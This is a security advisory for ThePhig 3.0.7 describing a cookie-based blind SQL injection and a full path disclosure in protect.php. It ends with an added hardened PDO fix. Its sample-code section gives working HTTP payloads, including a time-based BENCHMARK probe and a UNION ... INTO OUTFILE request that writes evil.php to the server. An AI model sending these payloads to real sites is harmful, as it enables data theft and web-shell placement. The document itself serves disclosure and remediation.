ThePhig 3.0.7 Multiple Remote Vulnerabilities

Name              ThePhig
Vendor            http://www.thephig.com
Versions Affected 3.0.7

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com

Date              2010-23-06

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION

ThePhig is an open-source PHP script created around the idea that creating an album of images should be as easy as uploading a directory of images.

II. DESCRIPTION

An improperly sanitised field is the cause of the following SQL Injection vulnerability.

III. ANALYSIS

Summary:

A) Blind SQL Injection
B) Full Path Disclosure

A) Blind SQL Injection

Using a crafted HTTP Cookie field, it is possible to inject arbitrary SQL statements into a SELECT query. Because of the query type, the injection may be used to write an arbitrary file into the upload directories.

protect.php:

  require_once('includes.php');
  $login = mysql_query("SELECT sha1(lastlogin) FROM thephig_users WHERE sha1(lastlogin)='$otp'");

includes.php:

  $otp = $_COOKIE['otp'];

B) Full Path Disclosure

Exploiting the same flaw, it is possible to learn the full path of the vulnerable script: when the injected query fails, mysql_query() returns false and the PHP warning emitted by the following line includes the absolute path of protect.php.

  if ( !mysql_num_rows($login) ) {

IV. SAMPLE CODE

A) Blind SQL Injection

GET /path/inc/protect.php HTTP/1.1
Host: targethost
Cookie: otp=-1' OR IF(ASCII(0x41)=65,BENCHMARK(999999999,NULL),NULL)#

Try to write a file:

GET /path/inc/protect.php HTTP/1.1
Host: targethost
Cookie: otp=-1' UNION SELECT 0x00 INTO OUTFILE '/path/evil.php

B) Full Path Disclosure

GET /path/inc/protect.php HTTP/1.1
Host: targethost
Cookie: otp=-1'

V. FIX

No Fix.
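Since the vendor shipped no fix, the following is an added example (written for this page, not ThePhig's own code) of how the cookie check in protect.php can be hardened against both issues in section III. It assumes a PDO connection named $pdo already exists (DSN and credentials are deployment-specific), and it takes the table name thephig_users and the column lastlogin from the advisory; the function name otp_is_valid is hypothetical. The cookie is allow-listed as a 40-character hex digest before it reaches the query, the query is parameterised so quotes and comment sequences cannot change the statement, and database errors are caught rather than surfaced as PHP warnings, which is what leaks the script path in III.B.

```php
<?php
// Added example, not ThePhig's code: hardened replacement for the
// 'otp' cookie check in protect.php. Assumed: $pdo is an existing
// PDO connection; thephig_users / lastlogin come from the advisory.

// Do not print errors to the client: PHP's mysql_* warnings include
// the absolute path of the failing script (the Full Path Disclosure).
ini_set('display_errors', '0');
ini_set('log_errors', '1');      // keep them in the server log instead
error_reporting(E_ALL);

// Make PDO throw instead of returning false, so failures are handled
// in one place below and never reach mysql_num_rows()-style warnings.
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

/**
 * Return true if $otp matches sha1(lastlogin) of some user.
 *
 * 1. Allow-list the input: a sha1 hex digest is exactly 40 characters
 *    of [0-9a-f]. Anything else (a quote, a '#', a UNION ...) is
 *    rejected before any SQL is built.
 * 2. Bind the value as a parameter; the SQL text is fixed, so the
 *    cookie can only ever be compared as data.
 */
function otp_is_valid(PDO $pdo, ?string $otp): bool
{
    if ($otp === null || !preg_match('/^[0-9a-f]{40}$/', $otp)) {
        return false;
    }

    try {
        $stmt = $pdo->prepare(
            'SELECT 1 FROM thephig_users WHERE sha1(lastlogin) = :otp LIMIT 1'
        );
        $stmt->execute([':otp' => $otp]);
        // fetchColumn() returns false when no row matched.
        return $stmt->fetchColumn() !== false;
    } catch (PDOException $e) {
        // Log the detail server-side; the client only sees a denial.
        error_log('otp check failed: ' . $e->getMessage());
        return false;
    }
}

// Usage in protect.php, replacing the mysql_query() call from the advisory.
$otp = $_COOKIE['otp'] ?? null;
if (!otp_is_valid($pdo, $otp)) {
    http_response_code(403);
    exit('Access denied');
}
```

With this in place, the three requests in section IV all fail the regex check and never touch the database, and a malformed or failing query produces a logged exception rather than a warning containing the web root.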